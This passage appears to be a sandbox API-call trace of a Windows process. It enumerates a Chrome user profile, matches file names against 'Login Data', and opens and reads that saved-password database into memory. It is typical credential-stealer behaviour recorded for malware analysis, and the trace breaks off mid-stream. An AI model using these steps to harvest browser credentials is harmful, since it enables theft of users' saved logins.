lpFindFileData=0x52d918 | out: lpFindFileData=0x52d918) returned 0 [0590.167] FindClose (in: hFindFile=0x5b9b50 | out: hFindFile=0x5b9b50) returned 1 [0590.167] LocalFree (hMem=0x63afc0) returned 0x0 [0590.167] LocalFree (hMem=0x5ecdb8) returned 0x0 [0590.167] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db94 | out: lpFindFileData=0x52db94) returned 1 [0590.167] lstrcmpiW (lpString1="Extensions", lpString2=".") returned 1 [0590.167] lstrcmpiW (lpString1="Extensions", lpString2="..") returned 1 [0590.167] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 63 [0590.167] lstrlenW (lpString="\\") returned 1 [0590.167] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 63 [0590.167] LocalAlloc (uFlags=0x40, uBytes=0x102) returned 0x5d1290 [0590.167] lstrlenW (lpString="Extensions") returned 10 [0590.167] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned 64 [0590.167] LocalAlloc (uFlags=0x40, uBytes=0x116) returned 0x5ecdb8 [0590.167] LocalFree (hMem=0x5d1290) returned 0x0 [0590.167] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions") returned 74 [0590.167] lstrlenW (lpString="\\*.*") returned 4 [0590.167] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions") returned 74 [0590.167] LocalAlloc (uFlags=0x40, uBytes=0x11e) returned 0x5ecee0 [0590.167] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\*.*", lpFindFileData=0x52d918 | out: lpFindFileData=0x52d918) returned 0x5b9b50 [0590.167] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0590.167] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d918 | out: lpFindFileData=0x52d918) returned 1 [0590.167] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0590.167] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0590.167] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d918 | out: lpFindFileData=0x52d918) returned 1 [0590.167] lstrcmpiW (lpString1="aohghmighlieiainnegkcijnfilokake", lpString2=".") returned 1 [0590.167] lstrcmpiW (lpString1="aohghmighlieiainnegkcijnfilokake", lpString2="..") returned 1 [0590.167] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions") returned 74 [0590.167] lstrlenW (lpString="\\") returned 1 [0590.167] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions") returned 74 [0590.167] LocalAlloc (uFlags=0x40, uBytes=0x118) returned 0x5ed008 [0590.167] lstrlenW (lpString="aohghmighlieiainnegkcijnfilokake") returned 32 [0590.167] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\") returned 75 [0590.168] LocalAlloc (uFlags=0x40, uBytes=0x158) returned 0x5e6798 [0590.168] LocalFree (hMem=0x5ed008) returned 0x0 [0590.168] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake") returned 107 [0590.168] lstrlenW (lpString="\\*.*") returned 4 [0590.168] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake") returned 107 [0590.168] LocalAlloc (uFlags=0x40, uBytes=0x160) returned 0x5e68f8 [0590.168] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\*.*", lpFindFileData=0x52d69c | out: lpFindFileData=0x52d69c) returned 0x5b9b10 [0590.168] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0590.168] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d69c | out: lpFindFileData=0x52d69c) returned 1 [0590.168] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0590.168] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0590.168] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d69c | out: lpFindFileData=0x52d69c) returned 1 [0590.168] lstrcmpiW (lpString1="0.0.0.6_0", lpString2=".") returned 1 [0590.168] lstrcmpiW (lpString1="0.0.0.6_0", lpString2="..") returned 1 [0590.168] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake") returned 107 [0590.168] lstrlenW (lpString="\\") returned 1 [0590.168] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake") returned 107 [0590.168] LocalAlloc (uFlags=0x40, uBytes=0x15a) returned 0x5e6a60 [0590.168] lstrlenW (lpString="0.0.0.6_0") returned 9 [0590.168] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\") returned 108 [0590.168] LocalAlloc (uFlags=0x40, uBytes=0x16c) returned 0x5e6bc8 [0590.168] LocalFree (hMem=0x5e6a60) returned 0x0 [0590.168] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.0.0.6_0") returned 117 [0590.168] lstrlenW (lpString="\\*.*") returned 4 [0590.168] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.0.0.6_0") returned 117 [0590.168] LocalAlloc (uFlags=0x40, uBytes=0x174) returned 0x5e6d40 [0590.168] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.0.0.6_0\\*.*", lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 0x5b9bd0 [0590.168] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0590.168] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 1 [0590.168] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0590.168] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0590.168] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 1 [0590.168] lstrlenW (lpString="\\") returned 1 [0590.168] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.0.0.6_0") returned 117 [0590.168] LocalAlloc (uFlags=0x40, uBytes=0x16e) returned 0x5e6ec0 [0590.168] lstrlenW (lpString="icon_128.png") returned 12 [0590.168] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.0.0.6_0\\") returned 118 [0590.168] LocalAlloc (uFlags=0x40, uBytes=0x186) returned 0x63efb8 [0590.168] LocalFree (hMem=0x5e6ec0) returned 0x0 [0590.168] StrStrIW (lpFirst="icon_128.png", lpSrch="Login Data") returned 0x0 [0590.168] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 1 [0590.168] lstrlenW (lpString="\\") returned 1 [0590.168] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.0.0.6_0") returned 117 [0590.168] LocalAlloc (uFlags=0x40, uBytes=0x16e) returned 0x5e6ec0 [0590.168] lstrlenW (lpString="icon_16.png") returned 11 [0590.168] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.0.0.6_0\\") returned 118 [0590.168] LocalAlloc (uFlags=0x40, uBytes=0x184) returned 0x63f148 [0590.168] LocalFree (hMem=0x5e6ec0) returned 0x0 [0590.168] StrStrIW (lpFirst="icon_16.png", lpSrch="Login Data") returned 0x0 [0590.169] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 1 [0590.169] lstrlenW (lpString="\\") returned 1 [0590.169] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.0.0.6_0") returned 117 [0590.169] LocalAlloc (uFlags=0x40, uBytes=0x16e) returned 0x5e6ec0 [0590.169] lstrlenW (lpString="main.html") returned 9 [0590.169] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.0.0.6_0\\") returned 118 [0590.169] LocalAlloc (uFlags=0x40, uBytes=0x180) returned 0x63f2d8 [0590.169] LocalFree (hMem=0x5e6ec0) returned 0x0 [0590.169] StrStrIW (lpFirst="main.html", lpSrch="Login Data") returned 0x0 [0590.169] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 1 [0590.169] lstrlenW (lpString="\\") returned 1 [0590.169] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.0.0.6_0") returned 117 [0590.169] LocalAlloc (uFlags=0x40, uBytes=0x16e) returned 0x5e6ec0 [0590.169] lstrlenW (lpString="main.js") returned 7 [0590.169] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.0.0.6_0\\") returned 118 [0590.169] LocalAlloc (uFlags=0x40, uBytes=0x17c) returned 0x63f460 [0590.169] LocalFree (hMem=0x5e6ec0) returned 0x0 [0590.169] StrStrIW (lpFirst="main.js", lpSrch="Login Data") returned 0x0 [0590.169] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 1 [0590.169] lstrlenW (lpString="\\") returned 1 [0590.169] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.0.0.6_0") returned 117 [0590.169] LocalAlloc (uFlags=0x40, uBytes=0x16e) returned 0x5e6ec0 [0590.169] lstrlenW (lpString="manifest.json") returned 13 [0590.169] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.0.0.6_0\\") returned 118 [0590.169] LocalAlloc (uFlags=0x40, uBytes=0x188) returned 0x63f5e8 [0590.169] LocalFree (hMem=0x5e6ec0) returned 0x0 [0590.169] StrStrIW (lpFirst="manifest.json", lpSrch="Login Data") returned 0x0 [0590.169] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 1 [0590.169] lstrcmpiW (lpString1="__MACOSX", lpString2=".") returned 1 [0590.169] lstrcmpiW (lpString1="__MACOSX", lpString2="..") returned 1 [0590.169] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.0.0.6_0") returned 117 [0590.169] lstrlenW (lpString="\\") returned 1 [0590.169] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.0.0.6_0") returned 117 [0590.169] LocalAlloc (uFlags=0x40, uBytes=0x16e) returned 0x5e6ec0 [0590.169] lstrlenW (lpString="__MACOSX") returned 8 [0590.169] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.0.0.6_0\\") returned 118 [0590.169] LocalAlloc (uFlags=0x40, uBytes=0x17e) returned 0x63f778 [0590.169] LocalFree (hMem=0x5e6ec0) returned 0x0 [0590.169] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.0.0.6_0\\__MACOSX") returned 126 [0590.169] lstrlenW (lpString="\\*.*") returned 4 [0590.169] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.0.0.6_0\\__MACOSX") returned 126 [0590.169] LocalAlloc (uFlags=0x40, uBytes=0x186) returned 0x5e6ec0 [0590.169] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.0.0.6_0\\__MACOSX\\*.*", lpFindFileData=0x52d1a4 | out: lpFindFileData=0x52d1a4) returned 0x5b9b90 [0590.169] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0590.169] FindNextFileW (in: hFindFile=0x5b9b90, lpFindFileData=0x52d1a4 | out: lpFindFileData=0x52d1a4) returned 1 [0590.170] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0590.170] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0590.170] FindNextFileW (in: hFindFile=0x5b9b90, lpFindFileData=0x52d1a4 | out: lpFindFileData=0x52d1a4) returned 0 [0590.170] FindClose (in: hFindFile=0x5b9b90 | out: hFindFile=0x5b9b90) returned 1 [0590.170] LocalFree (hMem=0x5e6ec0) returned 0x0 [0590.170] LocalFree (hMem=0x63f778) returned 0x0 [0590.170] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 0 [0590.170] FindClose (in: hFindFile=0x5b9bd0 | out: hFindFile=0x5b9bd0) returned 1 [0590.170] LocalFree (hMem=0x5e6d40) returned 0x0 [0590.170] LocalFree (hMem=0x5e6bc8) returned 0x0 [0590.170] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d69c | out: lpFindFileData=0x52d69c) returned 0 [0590.170] FindClose (in: hFindFile=0x5b9b10 | out: hFindFile=0x5b9b10) returned 1 [0590.170] LocalFree (hMem=0x5e68f8) returned 0x0 [0590.170] LocalFree (hMem=0x5e6798) returned 0x0 [0590.170] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d918 | out: lpFindFileData=0x52d918) returned 1 [0590.170] lstrcmpiW (lpString1="Temp", lpString2=".") returned 1 [0590.170] lstrcmpiW (lpString1="Temp", lpString2="..") returned 1 [0590.170] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions") returned 74 [0590.170] lstrlenW (lpString="\\") returned 1 [0590.170] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions") returned 74 [0590.170] LocalAlloc (uFlags=0x40, uBytes=0x118) returned 0x5ed008 [0590.170] lstrlenW (lpString="Temp") returned 4 [0590.170] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\") returned 75 [0590.170] LocalAlloc (uFlags=0x40, uBytes=0x120) returned 0x63cfc0 [0590.170] LocalFree (hMem=0x5ed008) returned 0x0 [0590.170] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\Temp") returned 79 [0590.170] lstrlenW (lpString="\\*.*") returned 4 [0590.170] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\Temp") returned 79 [0590.170] LocalAlloc (uFlags=0x40, uBytes=0x128) returned 0x63afc0 [0590.170] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\Temp\\*.*", lpFindFileData=0x52d69c | out: lpFindFileData=0x52d69c) returned 0x5b9b10 [0590.170] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0590.170] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d69c | out: lpFindFileData=0x52d69c) returned 1 [0590.170] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0590.170] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0590.171] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d69c | out: lpFindFileData=0x52d69c) returned 0 [0590.171] FindClose (in: hFindFile=0x5b9b10 | out: hFindFile=0x5b9b10) returned 1 [0590.171] LocalFree (hMem=0x63afc0) returned 0x0 [0590.171] LocalFree (hMem=0x63cfc0) returned 0x0 [0590.171] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d918 | out: lpFindFileData=0x52d918) returned 0 [0590.171] FindClose (in: hFindFile=0x5b9b50 | out: hFindFile=0x5b9b50) returned 1 [0590.171] LocalFree (hMem=0x5ecee0) returned 0x0 [0590.171] LocalFree (hMem=0x5ecdb8) returned 0x0 [0590.171] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db94 | out: lpFindFileData=0x52db94) returned 1 [0590.171] lstrlenW (lpString="\\") returned 1 [0590.171] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 63 [0590.171] LocalAlloc (uFlags=0x40, uBytes=0x102) returned 0x5d1290 [0590.171] lstrlenW (lpString="Favicons") returned 8 [0590.171] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned 64 [0590.171] LocalAlloc (uFlags=0x40, uBytes=0x112) returned 0x5ecdb8 [0590.171] LocalFree (hMem=0x5d1290) returned 0x0 [0590.171] StrStrIW (lpFirst="Favicons", lpSrch="Login Data") returned 0x0 [0590.171] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db94 | out: lpFindFileData=0x52db94) returned 1 [0590.171] lstrlenW (lpString="\\") returned 1 [0590.171] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 63 [0590.171] LocalAlloc (uFlags=0x40, uBytes=0x102) returned 0x5d1290 [0590.171] lstrlenW (lpString="Favicons-journal") returned 16 [0590.171] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned 64 [0590.171] LocalAlloc (uFlags=0x40, uBytes=0x122) returned 0x63afc0 [0590.171] LocalFree (hMem=0x5d1290) returned 0x0 [0590.171] StrStrIW (lpFirst="Favicons-journal", lpSrch="Login Data") returned 0x0 [0590.171] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db94 | out: lpFindFileData=0x52db94) returned 1 [0590.171] lstrlenW (lpString="\\") returned 1 [0590.171] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 63 [0590.171] LocalAlloc (uFlags=0x40, uBytes=0x102) returned 0x5d1290 [0590.171] lstrlenW (lpString="Google Profile.ico") returned 18 [0590.171] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned 64 [0590.171] LocalAlloc (uFlags=0x40, uBytes=0x126) returned 0x63b0f8 [0590.171] LocalFree (hMem=0x5d1290) returned 0x0 [0590.171] StrStrIW (lpFirst="Google Profile.ico", lpSrch="Login Data") returned 0x0 [0590.171] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db94 | out: lpFindFileData=0x52db94) returned 1 [0590.171] lstrlenW (lpString="\\") returned 1 [0590.171] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 63 [0590.171] LocalAlloc (uFlags=0x40, uBytes=0x102) returned 0x5d1290 [0590.171] lstrlenW (lpString="History") returned 7 [0590.171] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned 64 [0590.171] LocalAlloc (uFlags=0x40, uBytes=0x110) returned 0x5ed340 [0590.171] LocalFree (hMem=0x5d1290) returned 0x0 [0590.171] StrStrIW (lpFirst="History", lpSrch="Login Data") returned 0x0 [0590.171] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db94 | out: lpFindFileData=0x52db94) returned 1 [0590.171] lstrlenW (lpString="\\") returned 1 [0590.171] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 63 [0590.172] LocalAlloc (uFlags=0x40, uBytes=0x102) returned 0x5d1290 [0590.172] lstrlenW (lpString="History Provider Cache") returned 22 [0590.172] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned 64 [0590.172] LocalAlloc (uFlags=0x40, uBytes=0x12e) returned 0x63b368 [0590.172] LocalFree (hMem=0x5d1290) returned 0x0 [0590.172] StrStrIW (lpFirst="History Provider Cache", lpSrch="Login Data") returned 0x0 [0590.172] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db94 | out: lpFindFileData=0x52db94) returned 1 [0590.172] lstrlenW (lpString="\\") returned 1 [0590.172] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 63 [0590.172] LocalAlloc (uFlags=0x40, uBytes=0x102) returned 0x5d1290 [0590.172] lstrlenW (lpString="History-journal") returned 15 [0590.172] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned 64 [0590.172] LocalAlloc (uFlags=0x40, uBytes=0x120) returned 0x5ecee0 [0590.172] LocalFree (hMem=0x5d1290) returned 0x0 [0590.172] StrStrIW (lpFirst="History-journal", lpSrch="Login Data") returned 0x0 [0590.172] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db94 | out: lpFindFileData=0x52db94) returned 1 [0590.172] lstrlenW (lpString="\\") returned 1 [0590.172] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 63 [0590.172] LocalAlloc (uFlags=0x40, uBytes=0x102) returned 0x5d1290 [0590.172] lstrlenW (lpString="Login Data") returned 10 [0590.172] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned 64 [0590.172] LocalAlloc (uFlags=0x40, uBytes=0x116) returned 0x5ed008 [0590.172] LocalFree (hMem=0x5d1290) returned 0x0 [0590.172] StrStrIW (lpFirst="Login Data", lpSrch="Login Data") returned="Login Data" [0590.172] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x52db70 | out: ppstm=0x52db70*=0x57ea78) returned 0x0 [0590.172] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\google\\chrome\\user data\\default\\login data"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0590.172] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4800 [0590.173] ReadFile (in: hFile=0x5ac, lpBuffer=0x52cb68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cb60, lpOverlapped=0x0 | out: lpBuffer=0x52cb68*, lpNumberOfBytesRead=0x52cb60*=0x1000, lpOverlapped=0x0) returned 1 [0590.174] IStream:Commit (This=0x57ea78, grfCommitFlags=0x52cb68) returned 0x0 [0590.174] ReadFile (in: hFile=0x5ac, lpBuffer=0x52cb68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cb60, lpOverlapped=0x0 | out: lpBuffer=0x52cb68*, lpNumberOfBytesRead=0x52cb60*=0x1000, lpOverlapped=0x0) returned 1 [0590.174] IStream:Commit (This=0x57ea78, grfCommitFlags=0x52cb68) returned 0x0 [0590.174] ReadFile (in: hFile=0x5ac, lpBuffer=0x52cb68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cb60, lpOverlapped=0x0 | out: lpBuffer=0x52cb68*, lpNumberOfBytesRead=0x52cb60*=0x1000, lpOverlapped=0x0) returned 1 [0590.174] IStream:Commit (This=0x57ea78, grfCommitFlags=0x52cb68) returned 0x0 [0590.174] ReadFile (in: hFile=0x5ac, lpBuffer=0x52cb68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cb60, lpOverlapped=0x0 | out: lpBuffer=0x52cb68*, lpNumberOfBytesRead=0x52cb60*=0x1000, lpOverlapped=0x0) returned 1 [0590.174] IStream:Commit (This=0x57ea78, grfCommitFlags=0x52cb68) returned 0x0 [0590.174] ReadFile (in: hFile=0x5ac, lpBuffer=0x52cb68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cb60, lpOverlapped=0x0 | out: lpBuffer=0x52cb68*, lpNumberOfBytesRead=0x52cb60*=0x800, lpOverlapped=0x0) returned 1 [0590.174] IStream:Commit (This=0x57ea78, grfCommitFlags=0x52cb68) returned 0x0 [0590.174] ReadFile (in: hFile=0x5ac, lpBuffer=0x52cb68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cb60, lpOverlapped=0x0 | out: lpBuffer=0x52cb68*, lpNumberOfBytesRead=0x52cb60*=0x0, lpOverlapped=0x0) returned 1 [0590.174] CloseHandle (hObject=0x5ac) returned 1 [0590.174] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0590.174] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.174] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.174] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0590.174] IStream:SetSize (This=0x57ea78, libNewSize=0x52db48) returned 0x0 [0590.174] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.174] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.174] IStream:LockRegion (This=0x57ea78, libOffset=0x10, cb=0x0, dwLockType=0x0) returned 0x0 [0590.174] IStream:SetSize (This=0x57ea78, libNewSize=0x52db32) returned 0x0 [0590.174] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.174] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.174] IStream:LockRegion (This=0x57ea78, libOffset=0x12, cb=0x0, dwLockType=0x0) returned 0x0 [0590.174] IStream:SetSize (This=0x57ea78, libNewSize=0x52db33) returned 0x0 [0590.174] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.174] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.174] IStream:LockRegion (This=0x57ea78, libOffset=0x13, cb=0x0, dwLockType=0x0) returned 0x0 [0590.174] IStream:SetSize (This=0x57ea78, libNewSize=0x52db33) returned 0x0 [0590.174] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.174] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.174] IStream:LockRegion (This=0x57ea78, libOffset=0x14, cb=0x0, dwLockType=0x0) returned 0x0 [0590.174] IStream:SetSize (This=0x57ea78, libNewSize=0x52db33) returned 0x0 [0590.174] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.174] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.174] IStream:LockRegion (This=0x57ea78, libOffset=0x15, cb=0x0, dwLockType=0x0) returned 0x0 [0590.174] IStream:SetSize (This=0x57ea78, libNewSize=0x52db33) returned 0x0 [0590.174] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.174] IStream:LockRegion (This=0x57ea78, libOffset=0x0, 